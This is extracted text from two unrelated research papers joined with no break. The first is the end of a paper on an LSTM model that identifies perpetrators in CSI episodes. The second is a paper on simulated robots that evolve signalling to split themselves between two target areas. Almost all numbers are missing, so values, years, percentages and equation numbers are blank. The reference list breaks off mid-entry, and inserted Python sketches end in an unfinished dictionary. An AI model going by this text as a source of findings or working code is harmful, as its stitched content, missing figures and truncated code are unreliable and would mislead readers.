figure tracks model behavior over the course of two episodes, across equally sized intervals. we show the cumula- tive development of f (top plot), cumulative true positive counts (center plot), and true positive counts within each interval (bottom plot). red bars indicate times at which annotators pressed the red button. figure (right) shows that humans may outper- form the lstm in precision (but not necessarily in recall). humans are more cautious at guessing the perpetrator: the first human guess appears around sentence (see the leftmost red vertical bars in figure right), the first model guess around sen- tence , and the first true mention around sentence . once humans guess the perpetrator, however, they are very precise and consistent. interestingly, model guesses at the start of the episode closely fol- low the pattern of gold-perpetrator mentions (bottom plots in figure ). this indicates that early model guesses are not noise, but meaningful predictions. further analysis of human responses is illustrated in figure . for each of our three annotators we plot the points in each episode where they press the red button to indicate that they know the perpetra- tor (bottom). we also show the number of times (all three) annotators pressed the red button individually for each interval and cumulatively over the course of the episode. our analysis reveals that viewers tend to press the red button more towards the end, which is not unexpected since episodes are inherently de- signed to obfuscate the identification of the perpe- trator. moreover, figure suggests that there are two types of viewers: eager viewers who like our model guess early on, change their mind often, and therefore press the red button frequently (annotator pressed the red button . times on average per . . . . portion of episode lapsed annotator annotator annotator all annotators frequency all annotators cumulative figure : number of times the red button is pressed by each anno- tator individually (bottom) and by all three within each time interval and cumulatively (top). times are normalized with respect to length. statistics are averaged across / / cases per annotator / / . first correct perpetrator prediction min max avg lstm human table : sentence id in the script where the lstm and humans predict the true perpetrator for the first time. we show the earliest (min) latest (max) and av- erage (avg) prediction time over test episodes (five cross-validation splits). episode (season ): “let the seller beware” s s s s s s s s s grissom pulls out a small evidence bag with the filling he puts it on the table tooth fill- ing - - brass we also found your finger- prints and your hair peter b. look i’m sure you’ll find me all over the house peter b. i wanted to buy it peter b. i was ev- erywhere brass well you made sure you were every- where too didn’t you? episode (season ): “committed” s s s s s s s s grissom what’s so amusing? adam trent so let’s say you find out who did it and maybe it’s me. adam trent what are you going to do? adam trent are you going to convict me of murder and put me in a bad place? adam smirks and starts biting his nails. grissom is it you? adam trent check the files sir. adam trent i’m a rapist not a mur- derer. table : excerpts of csi episodes together with model predictions. model confidence (p(l = )) is illustrated in red, with darker shades corresponding to higher confidence. true perpetrator mentions are highlighted in blue. top: a conversation involving the true perpetrator. 
bottom: a conversation with a suspect who is not the perpetrator. episode) and conservative viewers who guess only late and press the red button less frequently (on av- erage annotator pressed the red button . times per episode, and annotator and . times). notice that statistics in figure are averages across several episodes each annotator watched and thus viewer behavior is unlikely to be an artifact of individual episodes (e.g., featuring more or less suspects). ta- ble provides further evidence that the lstm be- haves more like an eager viewer. it presents the time in the episode (by sentence count) where the model correctly identifies the perpetrator for the first time. as can be seen, the minimum and average identifi- cation times are lower for the lstm compared to human viewers. table shows model predictions on two csi screenplay excerpts. we illustrate the degree of the model’s belief in a perpetrator being mentioned by color intensity. true perpetrator mentions are high- lighted in blue. in the first example, the model mostly identifies perpetrator mentions correctly. in the second example, it identifies seemingly plausible sentences which, however, refer to a suspect and not the true perpetrator. . what if there is no perpetrator? in our experiments, we trained our model on csi episodes which typically involve a crime, commit- ted by a perpetrator, who is ultimately identified. how does the lstm generalize to episodes without c o u n t #sentences observed lstm fp human fp figure : cumulative counts of false positives (fp) for the lstm and a human viewer for an episode with no perpetrator (the victim committed suicide). red vertical bars show the times at which the viewer pressed the red button indicating that they (think they) have identified the perpetrator. a crime, e.g., because the “victim” turns out to have committed suicide? to investigate how model and humans alike respond to atypical input we present both with an episode featuring a suicide, i.e., an episode which did not have any true positive perpe- trator mentions. figure tracks the incremental behavior of a hu- man viewer and the model while watching the sui- cide episode. both are primed by their experience with csi episodes to identify characters in the plot as potential perpetrators, and consequently predict false positive perpetrator mentions. the human re- alizes after roughly two thirds of the episode that there is no perpetrator involved (he does not anno- tate any subsequent sentences as “perpetrator men- tioned”), whereas the lstm continues to make per- petrator predictions until the end of the episode. the lstm’s behavior is presumably an artifact of the re- curring pattern of discussing the perpetrator in the very end of an episode. conclusions in this paper we argued that crime drama is an ideal testbed for models of natural language understand- ing and their ability to draw inferences from com- plex, multi-modal data. the inference task is well- defined and relatively constrained: every episode poses and answers the same “whodunnit” ques- tion. we have formalized perpetrator identifica- tion as a sequence labeling problem and developed an lstm-based model which learns incrementally from complex naturalistic data. we showed that multi-modal input is essential for our task, as well an incremental inference strategy with flexible ac- cess to previously observed information. 
compared to our model, humans guess cautiously in the begin- ning, but are consistent in their predictions once they have a strong suspicion. the lstm starts guessing earlier, leading to superior initial true-positive rates, however, at the cost of consistency. there are many directions for future work. be- yond perpetrators, we may consider how suspects emerge and disappear in the course of an episode. note that we have obtained suspect annotations but did not use them in our experiments. it should also be interesting to examine how the model behaves out-of-domain, i.e., when tested on other crime se- ries, e.g., “law and order”. finally, more detailed analysis of what happens in an episode (e.g., what actions are performed, by who, when, and where) will give rise to deeper understanding enabling ap- plications like video summarization and skimming. acknowledgments the authors gratefully ac- knowledge the support of the european research council (award number ; frermann, lap- ata) and h eu project summa (award number /h -ict- ; cohen). we also thank our annotators, the tacl editors and anonymous re- viewers whose feedback helped improve the present paper, and members of edinburghnlp for helpful discussions and suggestions. references stanislaw antol, aishwarya agrawal, jiasen lu, m̃argaret mitchell, dhruv batra, c. lawrence zitnick, and devi parikh. . vqa: visual question an- swering. in proceedings of the ieee international conference on computer vision (iccv), pages – , santiago, chile. piotr bojanowski, francis bach, ivan laptev, jean ponce, cordelia schmid, and josef sivic. . finding ac- tors and actions in movies. in the ieee international conference on computer vision (iccv), pages – , sydney, australia. john s. boreczky and lynn d. wilcox. . a hid- den markov model framework for video segmentation using audio and image features. in proceedings of the ieee international conference on acoustics, speech and signal processing (icassp), pages – , seattle, washington, usa. samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large anno- tated corpus for learning natural language inference. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal. elia bruni, nam khanh tran, and marco baroni. . multimodal distributional semantics. journal of arti- ficial intelligence research, ( ): – , january. sachin chachada and c.-c. jay kuo. . environmen- tal sound recognition: a survey. apsipa transactions on signal and information processing, . jacob cohen. . a coefficient of agreement for nom- inal scales. educational and psychological measure- ment, ( ): – . timothee cour, chris jordan, eleni miltsakaki, and ben taskar. . movie/script: alignment and parsing of video and text transcription. in proceedings of the th european conference on computer vision, pages – , marseille, france. steven b. davis and paul mermelstein. . com- parison of parametric representations for monosyllabic word recognition in continuously spoken sentences. in alex waibel and kai-fu lee, editors, readings in speech recognition, pages – . morgan kaufmann publishers inc., san francisco, california, usa. nevenka dimitrova, lalitha agnihotri, and gang wei. . video classification based on hmm using text and faces. in proceedings of the th european signal processing conference (eusipco), pages – . ieee. desmond elliott and frank keller. . image descrip- tion using visual dependency representations. 
emergence of communication in embodied agents evolved for the ability to solve a collective navigation problem

davide marocco, stefano nolfi
institute of cognitive science and technologies, cnr, viale marx, rome, , italy
[davide.marocco; stefano.nolfi]@istc.cnr.it

in this paper we present the results of an experiment in which a collection of simulated robots that are evolved for the ability to solve a collective navigation problem develop a communication system that allows them to cooperate better. the analysis of the obtained results indicates how evolving robots develop a non-trivial communication system and exploit different communication modalities. results also indicate how the possibility to co-adapt the robots’ individual and social/communicative behaviour plays a key role in the development of progressively more complex and effective individuals.

. introduction

the development of embodied agents able to interact autonomously with the physical world and to communicate on the basis of a self-organizing communication system is a new and exciting field of research (steels and vogt, ; cangelosi and parisi, ; steels, ; steels and kaplan, ; marocco, cangelosi and nolfi, ; quinn et al, ; for a review see kirby, ; steels, ; wagner et al., ; nolfi, ). the objective is to identify how a population of agents equipped with a sensory-motor system and a cognitive apparatus can develop a grounded communication system and use their communication abilities to solve a given problem. answering this question is important for both scientific and technological reasons. from a scientific point of view, understanding how communication abilities and a communication system might emerge in a population of interacting embodied agents might shed light on the evolution of animal communication and on the origin of language.
from a technological point of view, understanding the fundamental principles involved might lead to the development of innovative communication methods for multi-agent software systems, autonomous robots, and ubiquitous computing devices. in this paper we present the results of an experiment in which a collection of simulated robots that are evolved for the ability to solve a collective navigation problem develop a communication system that allows them to cooperate better. robots are provided with simple sensory-motor systems that allow them to move, produce signals with varying frequencies, and gather information from their physical and social environment (including signals produced by other agents). since the chosen problem admits a variety of qualitatively different solutions and since robots are selected on the basis of their ability to solve the collective navigation problem (and not on the basis of their communication abilities), evolving robots are left free to determine the circumstances in which communication is used, the structure of the communication system (i.e. the number, the type and the “meaning” of signals), the communication modalities (i.e. the role played by communicating individuals), and the relation between individual and social/communication abilities. the analysis of the obtained results indicates how evolving robots develop a non-trivial communication system and exploit different communication modalities. results also indicate how the possibility to co-adapt the robots’ individual and social communicative behaviours play a key role in the development of progressively more complex and effective individuals. in the following section we will review the related literature. in section , we will describe our experimental setup and we will show how a communication ability emerges as a result of an indirect selective pressure. in section , we will describe the type of signals produced by evolved robots and their effects on other robots’ behaviours. in section we will describe the modalities with which evolved individuals communicate. in section , we will describe the relation between the individual and social/communicative behaviour. finally, in section , we will discuss the implications of the obtained results. . related literature in their pioneering work on evolution of communication werner and dyer ( ) evolved a simulated population of male and female agents living in a toroidal grid environment for the ability to ‘mate’ (i.e. for the ability of male agents to reach the physical location of female agents). the sensory-motor structure of the agents was designed so as to force them to rely on signalling behaviour and to prevent any possible alternative strategy. indeed, females are immobile (i.e. they cannot reach males) and males are blind (i.e. they cannot detect the position of females). females are allowed to detect the position and orientation of the closest male located in the x cells area surrounding them and to send signals (i.e. vectors of binary values) to all males located in the same surrounding area. males, on the other hand, are allowed to detect the signals produced by females and to move. by analyzing the obtained results, the authors showed how evolved individuals were able to solve the mating problem by exploiting their communication ability despite the fact that communication was not explicitly rewarded in the fitness function. 
by analysing how evolved males modified their motor behaviour on the basis of the signals detected, the authors showed how evolved females produced few different signals whose effect could be described with sentences like “go forward”, “turn left”, and “turn right”. more recently, cangelosi and parisi ( ) and marocco et al. ( ) demonstrated how communication can emerge also in experimental settings in which communication is not necessarily required to solve adaptive problems, but it allows individuals to achieve better performance. in marocco et al. ( ), for example, a population of robotic arm controllers have been evolved for the ability to discriminate objects with different shapes (i.e. spherical or cubic objects) on the basis of tactile sensory information by continuing to touch spherical objects while avoiding cubic objects. evolving robots are asked to play alternatively the role of speaker and hearer. when they assume the role of speaker they only receive as input the state of tactile sensors and are allowed to produce a vector of floating point value to ‘name’ the object. when they assume the role of hearer, they receive as input both tactile and communication information (i.e. the vector of floating point number produced by a speaker agent that previously interacted with the same object). evolved individuals display an ability to discriminate the two type of objects and to produce the appropriate motor behaviour (i.e. continuing to touch or avoiding the object) on the basis of tactile sensory information only but they also develop an ability to name the two objects with different patterns and to use these patterns to discriminate the objects immediately, thus avoiding to waste the time necessary to discriminate objects through physical interactions. quinn et al. (quinn ; quinn et al, ) evolved a team of mobile robots for the ability to move while remaining close to one another. robots are only provided with proximity sensors and therefore do not have dedicated communication channels. despite of that, they evolve a primitive form of implicit communication based on bodily movement that allows them to coordinate and to assume different roles (see also baldassarre et al, ). this is achieved through two sub-behaviours: ( ) an approaching behaviour in which one of the two robots tends to produce a sustained level of activation on the infrared sensors of the other robot, and ( ) a front-inversion behaviour in which the robot that experiences a sustained level of activation in its infrared sensors inverts its direction of movement. the combination of these two sub-behaviours, in fact, allows the two robots to align and to assume the role of follower and leader, respectively. finally, di paolo ( ) reported the results of a set of experiments in which two simulated robots moving in an arena have been evolved for the ability to approach each other and to remain close together as long as possible. robots are provided with two motors controlling the two wheels, a sound organ able to produce sounds with different intensities, and two sound sensors symmetrically placed at ± degrees with respect to the frontal side of the robot that detects the intensity of the sound produced by the two robots. evolved robots exploit the possibility to modulate the intensity of the produced sounds by producing rhythmical sounds with varying intensities phase-locked at some value near perfect anti- phase. 
like the authors of the models reviewed above, we are interested in building a model in which communication can emerge without being explicitly rewarded. however, we are also interested in experimental set-ups in which individual and social/communicative behaviour can co-evolve by mutually shaping one another. moreover, we are interested in studying how individuals might discover categories that are useful from a communication point of view and that are not already explicitly or implicitly identified in the experimental setting. finally, we are interested in studying how not only communication abilities but also communication modalities, that regulate how individuals interact/communicate, can emerge as a result of an indirect selective pressure. for this reason, we will not impose a restricted and predefined interaction schema and we will leave robots free to determine the modality with which they will interact. by restricted and predefined interaction schema we mean the interaction modality adopted for example in werner and dyer ( ), in which females and males individuals can only play the role of the speaker and hearer, respectively. or the interaction modality adopted in cangelosi and parisi ( ) and marocco et al. ( ), in which, agents alternatively assume the role of speaker or hearer and in which speakers are allowed to send to hearer robots a signal consisting of a single pattern after having interacted for a certain amount of time with the same object that will be experienced by the hearer. . experimental set-up and emergence of communication a group of four simulated robots live in a square arena of x cm surrounded by walls that contains two circular target areas (see figure , left). the robots have a circular body with a radius of cm and are provided with: two motors controlling the two corresponding wheels, one communication actuator capable of sending signals with varying frequencies (signals are encoded as floating point values ranging from . to . ), eight infrared sensors (that detect obstacles up to a distance of about cm), one ground sensor (which, by detecting the colour of the floor, can ascertain whether the robot is located on a target area or not), and four communication sensors that detect signals produced by other robots up to a distance of cm from four corresponding directions (i.e. frontal [ o- o], rear [ o- o], left [ o- o], right [ o- o]) . the implementation of communication sensors are shaped in a way that allows robots to detect signals emitted by only a single robot for each direction. we are currently trying to implement these robots in hardware. robots’ signalling production and detection system will be based on designer systems ds-ircm infrared wireless communication modules sold by totalrobots, that allow the formation of a local bi-directional wireless network, and appropriate software routines. communication between modules only occurs within a given angular range and within a distance up to meters. interferences between modules are prevented by hardware and software routines that check the intensity of incoming signals. figure . left: the environment and the robots. the square represents the arena surrounded by walls. the two grey circles represent two target areas. the four black circles represent four robots. right: the neural controller of evolving robots. internal neurons and recurrent connections are only included in one of the two experimental settings (see text). 
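as an illustration of the sensory model just described, the following python sketch shows one way the four directional communication sensors could be computed in simulation: each sensor returns the signal of the nearest emitting robot that falls within its angular sector and within the detection range. the class, the numeric parameters, and the nearest-emitter rule are assumptions consistent with the description above, not the authors' original code.

import math
from dataclasses import dataclass

@dataclass
class RobotState:
    x: float          # position (cm)
    y: float
    heading: float    # orientation (degrees)
    signal: float     # currently emitted signal

# placeholder values: the exact range and sector boundaries are not legible
# in this copy of the text
COMM_RANGE_CM = 100.0
SECTORS = {"front": (-45.0, 45.0), "left": (45.0, 135.0),
           "rear": (135.0, 225.0), "right": (225.0, 315.0)}

def comm_sensor_readings(robot, others):
    """one reading per sector: the signal of the closest emitter heard in that
    sector (0.0 if none is within range), matching the constraint that only a
    single robot can be detected for each direction."""
    readings = {name: 0.0 for name in SECTORS}
    nearest = {name: float("inf") for name in SECTORS}
    for other in others:
        dx, dy = other.x - robot.x, other.y - robot.y
        dist = math.hypot(dx, dy)
        if dist == 0.0 or dist > COMM_RANGE_CM:
            continue
        # bearing of the emitter relative to the robot's heading, wrapped to [-45, 315)
        bearing = (math.degrees(math.atan2(dy, dx)) - robot.heading + 45.0) % 360.0 - 45.0
        for name, (lo, hi) in SECTORS.items():
            if lo <= bearing < hi and dist < nearest[name]:
                nearest[name], readings[name] = dist, other.signal
    return readings

the robot's own signal emitted at the previous time step would be fed back through a separate input, as described in the next paragraph.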
the robots’ neural controllers consist of neural networks with sensory neurons (that encode the activation states of the corresponding sensors and the activation state of the communication actuator at time t-1, i.e. each robot can hear its own emitted signal at the previous time step) directly connected to the three motor neurons that control the desired speed of the two wheels and the communication signal produced by the robot. in a first experimental setting, neural controllers did not include internal neurons and recurrent connections. in the second experimental setting, neural controllers also included two internal neurons with recurrent connections. in both cases the output of motor neurons was computed according to the logistic function ( ). in the case of the second experimental setting, the output of sensory and internal neurons was computed according to functions ( ) and ( ), respectively (for a detailed description of these activation functions and the relation with other related models, see nolfi [ ]). we will call the robots of the former experimental setting reactive robots (since in their case motor actions can only be determined on the basis of the current sensory state, plus the copy of the communication neuron at time t-1) and the robots of the latter experimental setting non-reactive robots (since in their case the motor actions are also influenced by previous sensory and internal states).

$a_j = t_j + \sum_i w_{ij} o_i$ ( )

$o_j = \frac{1}{1 + e^{-a_j}}$ ( )

$o_j = o_j^{(t-1)} \tau_j + i_j (1 - \tau_j)$ ( )

$o_j = o_j^{(t-1)} \tau_j + \frac{1}{1 + e^{-a_j}} (1 - \tau_j)$ ( )

with $a_j$ being the activity of the jth neuron, $t_j$ being the bias of the jth neuron, $w_{ij}$ the weight of the incoming connections from the ith to the jth neuron, $o_i$ the output of the ith neuron, $o_j^{(t-1)}$ the output of the jth neuron at the previous time step, $\tau_j$ the time constant of the jth neuron, and $i_j$ the intensity of the jth sensor. robots were evolved for the ability to find and remain in the two target areas by subdividing themselves equally between the two areas. each team of four robots was allowed to "live" for trials, lasting seconds (i.e. time steps of ms each). at the beginning of each trial the positions and the orientations of the robots were randomly assigned outside the target areas. the fitness of the team of robots consists of the sum of . scores for each robot located in a target area and a score of - . for each extra robot (i.e. each robot exceeding the maximum number of two) located in a target area. the total fitness of a team is computed by summing the fitness gathered by the four robots in each time step. the initial population consisted of randomly generated genotypes that encoded the connection weights, the biases, and the time constants (in the case of non-reactive robots) of the corresponding neural controllers (each parameter is encoded with bits and normalized in the range [- . , + . ] in the case of connection weights and biases, and in the range [ . , . ] in the case of time constants). each genotype is translated into identical neural controllers that are embodied in the four corresponding robots (i.e. teams are homogeneous and consist of four identical robots; for a discussion about this point and alternative selection schemas see quinn, , ; quinn et al. ; baldassarre et al. ). the best genotypes of each generation were allowed to reproduce by generating five copies each, with % of their bits replaced with a new randomly selected value. the evolutionary process lasted generations (i.e.
the process of testing, selecting and reproducing robots is iterated times). the experiment was replicated times for each of the two experimental conditions (reactive and non-reactive neural controllers). figure . the behaviour displayed by the team of evolved robots of one of the best replications for reactive (left) and non-reactive robots (right). the square and the grey circles indicate the arena and the target areas, respectively. lines inside the arena indicate the trajectories of the four robots during a trial. the numbers indicate the starting and ending position of the corresponding robot (the ending position is marked with a white circle). by analysing the behaviour of one of the best teams of evolved robots for the two experimental conditions we can see how both reactive and non-reactive robots are able to find and remain in the two target areas by equally distributing themselves between the two. figure (left) shows a typical behaviour exhibited by reactive robots. in this example robots # and # quickly reach two different empty target areas. then, robot # joins robot # in the top-left target area. robot # approaches and avoids the top-left target area (that already contains two robots) and later joins the bottom-left target area. in the example shown in the right part of figure , which displays a typical behaviour exhibited by non-reactive robots, robots # and # quickly reach two different empty target areas. later on, robot # and then robot # approach and enter the bottom-right target area. as soon as the third robot (i.e. robot # ) enters the area, robot # leaves the bottom-right target area and, after exploring the environment for a while, enters and remains in the top-left target area. to determine whether the possibility to signal and to use other robots’ signals is exploited by evolving robots, and whether the type of neural architecture influences the obtained performance, we tested the evolved teams of the reactive and non-reactive experiments in three conditions: a normal condition; a deprived condition in which robots were not allowed to detect other robots’ signals (i.e. in which communication sensors were always set to a null value); and a no-signals condition in which the two sets of evolutionary experiments were replicated without allowing robots to detect other robots’ signals and in which the evolved robots were tested in the same deprived condition (see figure ). figure . average fitness of all teams of the last generations of different replications of the experiments. grey and black histograms represent the average fitness of reactive and non-reactive robots, respectively. "normal" histograms represent the fitness obtained by testing the robots in a normal condition (the same condition in which they have been evolved). "deprived" histograms represent the fitness obtained by testing robots (evolved in a normal condition) in a control condition in which they are not allowed to detect other robots’ signals. "no-signals" histograms represent the fitness obtained by evolving and testing robots in a control condition in which they are not allowed to detect other robots’ signals. fitness values are normalized in the range [ . - . ], where . corresponds to the case in which individuals spend the entire lifetime in target areas equally divided into two groups (i.e. a fitness value that cannot be reached in practice since robots first have to locate and reach the two target areas). in all cases, individuals have been tested for trials.
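to make the controller and the test conditions concrete, the sketch below implements the non-reactive variant described by the activation functions above (leaky sensory neurons, two leaky internal neurons with recurrent connections, logistic motor neurons) together with a trial loop in which the communication inputs can be zeroed to reproduce the "deprived" condition. the network sizes, the random initialisation, and the simulator interface (env, read_sensors, and so on) are placeholders, not the authors' implementation.

import numpy as np

def logistic(a):
    # o = 1 / (1 + e^(-a))
    return 1.0 / (1.0 + np.exp(-a))

class NonReactiveController:
    """sketch of the non-reactive controller: leaky sensory neurons feed two
    leaky internal neurons (with recurrent connections), which feed the three
    motor neurons (left wheel, right wheel, emitted signal)."""
    def __init__(self, rng, n_sensors=14, n_internal=2, n_motors=3):
        # n_sensors = 8 infrared + 1 ground + 4 communication + 1 copy of own signal
        self.w_si = rng.uniform(-5, 5, (n_internal, n_sensors))   # sensor -> internal
        self.w_ii = rng.uniform(-5, 5, (n_internal, n_internal))  # recurrent
        self.w_im = rng.uniform(-5, 5, (n_motors, n_internal))    # internal -> motor
        self.bias_i = rng.uniform(-5, 5, n_internal)
        self.bias_m = rng.uniform(-5, 5, n_motors)
        self.tau_s = rng.uniform(0, 1, n_sensors)                 # time constants
        self.tau_i = rng.uniform(0, 1, n_internal)
        self.o_s = np.zeros(n_sensors)                            # outputs at t-1
        self.o_i = np.zeros(n_internal)

    def step(self, intensities):
        # leaky sensory neurons: o = o_prev * tau + i * (1 - tau)
        self.o_s = self.o_s * self.tau_s + intensities * (1.0 - self.tau_s)
        # leaky internal neurons with logistic activation
        a_i = self.bias_i + self.w_si @ self.o_s + self.w_ii @ self.o_i
        self.o_i = self.o_i * self.tau_i + logistic(a_i) * (1.0 - self.tau_i)
        # motor neurons use the plain logistic output
        return logistic(self.bias_m + self.w_im @ self.o_i)

COMM_SLICE = slice(9, 13)   # assumed positions of the four communication sensors

def run_trial(env, controllers, deprived=False, steps=1000):
    """one trial; with deprived=True the communication sensors are nulled."""
    env.reset()
    fitness = 0.0
    for _ in range(steps):
        for robot, ctrl in zip(env.robots, controllers):
            s = env.read_sensors(robot)     # placeholder simulator call
            if deprived:
                s[COMM_SLICE] = 0.0
            left, right, signal = ctrl.step(s)
            env.apply(robot, left, right, signal)
        env.advance()
        # per-step team score: a positive score for each robot in a target area,
        # a penalty for each robot beyond two, as described above
        fitness += env.team_score()
    return fitness

a reactive controller would omit the internal layer and the leaky integration, mapping the raw sensor intensities (plus the copy of the previously emitted signal) directly to the motor neurons.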
performance in the “normal” condition is better than in the other two conditions. the difference is statistically significant (p < . ) both in the case of reactive and non-reactive robots. the fact that performance in the “normal” condition are better demonstrate that robots use their ability to produce and detect signals. the fact that non-reactive outperform reactive robots in the normal condition (differences in performance are statistically significant) indicates that the possibility to integrate sensory- motor information through time is exploited by non-reactive individuals. moreover, the fact that the differences of performance between reactive and non-reactive conditions are not statistically significant in the “deprived” and “no-signal” conditions indicates that the possibility to integrate sensory-motor information through time is exploited by communicating individuals only. we will analyse the differences between robots’ individual and social behaviour and the relation between these two forms of behaviours in more detail in section . . the evolved communication system: signals produced and their effects of other robots behaviour by analysing the teams of the best replication of the experiment we observed that evolved individuals developed a non-trivial communication system, both in the case of the reactive and non-reactive experiments. more specifically evolving robots display an ability to develop a sort of lexicon (including - different signals), a perceptually grounded categorization of the physical and social world reflected by the different signals, an ability to appropriately modulate their motor behaviour on the basis of the signals detected, an ability to appropriately modulate their signalling behaviour on the basis of the signals detected. in the next two sections we will describe in details the signals produced by reactive and non-reactive robots in different conditions and the effect of the detected signals on robots’ motor and signalling behaviours. as we will see, in the case of the best replication, reactive and non-reactive robots developed a similar signalling system. however, non-reactive robots outperform reactive robots in their ability to “use” the signals detected. in section we will describe the evolved communication modalities. finally, in section , we will describe robots’ individual behaviour and the relation between individual and social/communicative behaviours. . experiment i – reactive robots reactive robots of the best replication (the same described in figure , left) produce at least four different types of signals: (a) a signal a with an value of about . produced by robots located outside the target areas not interacting with other robots located inside target areas; (b) a signal b with an value of about . produced by robots located alone inside a target area; (c) a signal c, an highly varying signal with an average value of . , produced by robots located inside a target area that also contains another robot; (d) a signal d with an value of about . produced by robots that are approaching a target area and are interacting with another robot located inside the target area. robots receiving these four types of signals modify their motor and/or signalling behaviour on the basis of the signal received and on other available sensory information. more specifically: ( ) robots located outside the target areas receiving signal a tend to modify their motor behaviour in a way that allow them to explore the environment more effectively, i.e. 
to find more quickly the target areas (see below); ( ) robots located outside target areas receiving signal b tend to modify their motor behaviour (by approaching the robot emitting the signal and the corresponding target area) and their signalling behaviour (i.e. by producing signal d instead of signal a); ( ) robots located outside the target areas receiving the signal c (i.e. the signal produced by two robots located inside a target area) modify their motor behaviour so as to move away from the signal source. ( ) robots located inside the target areas that receive the signal c (i.e. the signal produced by two other robots located inside the target area) tend to modify their motor behaviour so as to exit from the target area. to verify the functionality of signal a, we measured the time elapsed until at least one robot of the team reaches one of the two target areas in a normal condition and in a control condition in which robots were not allowed to detect signals (i.e. in which the state of the four communication sensors of all robots was always set to a null value). by testing the best evolved team of robots in the two conditions, we observed that the time needed to reach the first target area, on the average, is . s and . s in the case of the normal and the control condition, respectively (grey bars in figure ). this implies that signals a, produced by robots located outside target areas allow the team to better explore the environment and, consequently, to more quickly reach the target areas. normal deprived figure . the average time elapsed (seconds) until at least one robot of the team reaches one of the two target areas in a normal condition (“normal”) and in a control condition (“deprived”) in which robots were not allowed to detect signals during the test. black and grey bars represent the average time required by non-reactive and reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. to verify the functionality of signal b, we tested a team consisting of two robots placed in an environment including only a single target area (one of the robots was manually placed into the target area, while the other one was placed in a random position outside the area) in a normal condition and in a control condition in which robots were not allowed to detect signals (i.e. in which the state of the four communication sensors of all robots was always set to a null value). testing the best evolved team of robots in the two conditions, we observed that the percentage of trials in which the robot placed outside was able to reach the target area within seconds is . % and . % in the normal and control condition, respectively (grey bars in figure ). this demonstrates that robots detecting signal b modify their motor behaviour so to approach the source of the signal. we will discuss the effect of signal b on robots signalling behaviour in the next section. normal deprived figure . percentage of trials in which both robots were able to reach the target area. tests of a team consisting of two robots placed in an environment including only a single target area in a normal condition (“normal”) and in a control condition (“deprived”) in which robots were not allowed to detect signals. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. robots located inside a target area produce signal b. 
however, two interacting robots located in the same target area reciprocally modulate their signalling behaviour so as to produce signal c (i.e. a highly varying signal with an average value of . ). indeed, by placing two robots in a target area and by preventing the former to detect the signal produced by the latter, we observed that the first robot produces the signal b. to verify whether signal c reduces the chances that more than two robots enter in the same target area, we tested a team consisting of three robots in an environment including only a single target area in a normal condition and in a “deprived” control condition in which communication was disabled (i.e. in which the state of the four communication sensors of all robots was always set to a null value). at the beginning of each trial two robots are placed inside the target area and one robot is placed outside the target area with randomly selected positions and orientations. testing the best evolved team of robots in the two conditions we observed that the percentage of trials in which the robot initially placed outside the target area erroneously enters the area is . % and . %, in the normal and control condition, respectively (see grey bars in figure ). to verify whether signal c increases the chances that a robot exits from a target area that contains more than two robots we tested a team of three robots in an environment including only a single target area in a normal condition and in a “deprived” control condition in which communication was disabled. at the beginning of each trial, all three robots were placed inside the target area with randomly selected positions and orientations. the percentage of times in which one of the three robots exit from the target area is . % and . % in normal and deprived conditions, respectively (see figure , grey bars). normal deprived figure . percentage of trials in which a third robot erroneously enters in a target area that already contains two robots in a normal condition (“normal”) and in a control condition (“deprived”) in which robots were not allowed to detect signals. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. normal deprived figure . percentage of times in which one robot exit from a target area that contains three robots in a normal condition (“normal”) and in a control condition (“deprived”) in which robots were not allowed to detect signals. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. . experiment ii – non-reactive robots non-reactive robots of the best replication (the same described in figure , right) produce at least five different types of signals. the signals a, b, c and d are analogous to the corresponding signals produced by reactive robots (i.e. although the value of the signals varies, they are produced in the same circumstances and have functionally similar effects). more precisely, non-reactive robots produce the following signals: (a) a signal a with an value of about . produced by robots located outside the target areas that do not detect other robots’ signals; (b) a signal b with an value of about . produced by robots located alone inside a target area; (c) a signal c, an highly varying signal with an average value of . 
, produced by robots located inside a target area that also contains another robot; (d) a signal d with an value of about . produced by robots outside target areas that are approaching a target area and are interacting with another robot located inside the target area. (e) a signal e, an highly varying with an average value of . , produced by robots located outside the target areas interacting with other robots also located outside target areas. robots receiving these five types of signals modify their motor and/or signalling behaviour on the basis of the signal received and of other available sensory information. more specifically: ( ) robots located outside the target areas receiving signal a modify their signalling behaviour by producing signal e; ( ) robots located outside target areas receiving signal b tend to modify their motor behaviour (by approaching the robot emitting the signal and the corresponding target area) and their signalling behaviour by producing signal d; ( ) robots located outside the target areas receiving the signal c (i.e. the signal produced by two robots located inside the target area) modify their motor behaviour so as to move away from the signal source; ( ) robots located inside target areas receiving the signal c (i.e. the signal produced by two robots located inside the target area) modify their motor behaviour so as to exit from the target area. ( ) robots located outside the target areas receiving signal e tend to modify their motor behaviour to better explore the environment. the fact that signals a and e produced by robots located outside target areas allow them to explore the environment more effectively (i.e. to more quickly find target areas) is demonstrated by the fact that the average time in which the first robot enter in one of the two target areas is . s and . s in normal and deprived conditions, respectively (see the black bars in figure ). by testing the best teams of the other replications of the experiment similar results were observed in most of the cases (result not shown). overall, these results indicate that robots exploit their signalling behaviour to produce a form of coordinated exploration that increases their ability to quickly find the target areas. to identify the relative roles of the two signals we ran an additional test in which robots were allowed to produce and detect signal a but were not allowed to switch from signal a to e (they were forced to produce signal a even when they start to detect the signal a produced by other robots). the obtained result (i.e. an average time of . s) indicates that the functionality is provided by the signal e, while the role of signal a is that to trigger the production of signal e. the fact that signal b increases the chances that other robots enter the target area from which the signal is produced is demonstrated by the fact that the percentage of trials in which a robot placed outside the target area enters in a target area that already contains a single robot is . % and . % in the case of robot tested in normal and deprived conditions, respectively (see the black bars in figure ). the fact that signal c reduces the chances that other robots enter into a target area that already contains two robots is demonstrated by the fact that the percentage of times in which a third robot joins a target area that already contains two other robots is . % and . % in normal and deprived conditions, respectively (see figure , black bars). 
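for reference, the signal classes described in this and the previous subsection can be collected into a small lexicon keyed by the context in which each signal is emitted. the entries paraphrase the descriptions in the text for the non-reactive robots (signal e is absent in the reactive ones); the approximate numeric values of the signals are omitted.

# context in which a signal is emitted -> (label, observed function)
SIGNAL_LEXICON = {
    "outside the areas, no relevant signal detected":
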